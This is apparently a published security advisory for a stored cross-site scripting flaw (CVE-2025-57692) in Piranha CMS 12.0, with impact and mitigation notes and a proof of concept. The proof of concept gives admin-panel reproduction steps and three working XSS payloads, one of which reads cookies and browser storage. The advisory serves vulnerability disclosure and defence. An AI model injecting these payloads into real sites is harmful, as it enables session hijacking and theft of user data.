Overview
Piranha CMS 12.0 contains a Stored Cross-Site Scripting (XSS) flaw in the Text Block feature. The flaw allows attackers to inject malicious scripts into the web application, which are then executed in the browsers of unsuspecting users. Stored XSS is particularly dangerous because it can lead to unauthorized access and data theft, affecting both the application and its users.
Technical Details
The Stored XSS vulnerability in Piranha CMS occurs when user input is not properly sanitized before being stored in the database. Attackers can manipulate the Text Block by inserting scripts that execute upon retrieval. For instance, an attacker could input a script that captures session cookies or redirects users to a malicious site. When an administrator or user views the affected Text Block, the script runs, potentially compromising their session and sensitive information.
This vulnerability primarily arises from inadequate input validation and output encoding. By leveraging this flaw, an attacker can embed JavaScript code that executes within the browser of any user who accesses the compromised content, making it a persistent threat across the application.
Impact
The potential consequences of this vulnerability are severe. Successful exploitation can lead to session hijacking, credential theft, and unauthorized actions being performed on behalf of the user. Additionally, attackers can deploy phishing campaigns or distribute malware, significantly damaging the reputation of the affected organization and eroding user trust.
Mitigation
To protect against the Stored XSS vulnerability in Piranha CMS 12.0, developers and security professionals should implement robust input validation and output encoding practices. Ensure that all user-generated content is sanitized before being stored and rendered. Utilizing security libraries that automatically escape outputs can significantly reduce the risk of XSS attacks.
Moreover, organizations should conduct regular security audits and penetration testing to identify and remediate vulnerabilities in their applications. Keeping Piranha CMS and its components up to date is also crucial, as security patches may address known vulnerabilities. Educating users about the risks associated with XSS and promoting safe browsing habits can further enhance security posture.
Proof of Concept (PoC)
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
## Reproduction Steps ##
PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user's browser.
Reproduction steps
1. Log in to the Piranha admin panel at https://<host>/manager/login.
2. Navigate to Pages.
3. Click Add Page and choose Standard Page or Standard Archive.
4. Enter a page title (e.g., XSS-Test).
5. Click the [ + ] button and select Text under Content to add a Text block.
6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.
Payload A
<img src="x" onerror="
alert(
'Cookies: ' + document.cookie + '\n' +
'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
'URL: ' + window.location.href + '\n' +
'User Agent: ' + navigator.userAgent + '\n' +
'Time: ' + new Date().toLocaleString()
)
" />
Payload B — iframe base64
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
Payload C — details toggle (on-toggle alert)
<details open ontoggle=alert('XSS')>Click</details>
7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).
8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.